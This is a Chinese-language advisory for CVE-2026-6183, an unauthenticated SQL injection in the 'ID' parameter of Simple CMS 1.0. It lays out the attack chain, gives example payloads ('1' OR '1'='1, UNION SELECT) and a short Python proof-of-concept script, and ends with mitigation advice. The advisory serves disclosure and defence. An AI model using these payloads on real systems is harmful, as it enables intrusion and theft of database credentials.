CVE-2026-6183 CVSS 7.3 高危

CVE-2026-6183 Simple CMS SQL注入漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6183

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Simple Content Management System

漏洞概述

code-projects Simple Content Management System 1.0 在处理用户请求时存在严重的安全缺陷。具体而言，/web/index.php 文件对传入的 'ID' 参数缺乏严格的输入验证，从而引发了 SQL 注入漏洞。由于无需任何用户交互和身份认证，远程攻击者可轻易构造恶意请求利用此漏洞，进而窃取数据库数据、篡改页面内容或破坏系统可用性。

技术细节

该漏洞属于典型的 SQL 注入漏洞，根源在于应用程序对用户输入缺乏有效的过滤和转义。在 Simple CMS 1.0 的 /web/index.php 文件中，程序直接获取用户提交的 'ID' 参数，并将其动态拼接到 SQL 查询语句中执行。由于未采用参数化查询或输入白名单机制，攻击者可以构造包含恶意 SQL 语法（如单引号闭合、联合查询 `UNION SELECT`、布尔盲注语句等）的 Payload。攻击者通过向服务器发送精心设计的 HTTP 请求，即可操纵数据库逻辑。鉴于该漏洞无需身份认证且可远程利用，攻击者可以利用此漏洞读取数据库中的敏感信息（如管理员密码、用户数据），甚至在某些情况下写入 WebShell 或破坏数据库结构，对系统安全构成严重威胁。

攻击链分析

STEP 1

侦察

攻击者识别出目标服务器运行的是 Simple Content Management System 1.0，并确认存在 /web/index.php 接口。

STEP 2

制作Payload

攻击者构造针对 'ID' 参数的恶意 SQL 语句，例如利用 '1' OR '1'='1 或 UNION SELECT 语句来绕过验证或提取数据。

STEP 3

发送请求

攻击者通过 HTTP GET 或 POST 请求，将包含恶意 Payload 的 'ID' 参数发送给 /web/index.php。

STEP 4

执行注入

后端数据库接收到未经过滤的参数，直接将其拼接到 SQL 查询中并执行，导致攻击者意图的 SQL 命令运行。

STEP 5

获取数据

攻击者根据查询结果获取数据库敏感信息（如管理员账号密码），或进一步篡改数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_sqli(url):
    # Payload to test SQL Injection vulnerability
    payload = "1' UNION SELECT 1, user(), 3-- -"
    
    # Target parameter 'ID' in the vulnerable file
    params = {
        "ID": payload
    }
    
    try:
        response = requests.get(url, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Potential SQL Injection found!")
            print(f"[+] Response: {response.text[:500]}")
        else:
            print("[-] Target did not respond as expected.")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://target-ip/web/index.php"
    check_sqli(target)

影响范围

Simple Content Management System 1.0

防御指南

临时缓解措施

如果无法立即升级，建议在 Web 服务器（如 Nginx 或 Apache）层面部署 WAF 规则，拦截包含常见 SQL 注入特征（如单引号、UNION、SELECT 等）的请求参数。同时，暂时禁用受影响页面的对外访问，或对数据库访问日志进行实时监控，发现异常查询立即阻断。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-6183
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-6183
3 Details https://www.cvedetails.com/cve/CVE-2026-6183/
4 VulDB https://vuldb.com/cve/CVE-2026-6183
5 Link https://code-projects.org/
6 Link https://github.com/Xmyronn/simple-cms-sqli-id-parameter
7 Link https://vuldb.com/submit/797264
8 Link https://vuldb.com/vuln/357106
9 Link https://vuldb.com/vuln/357106/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表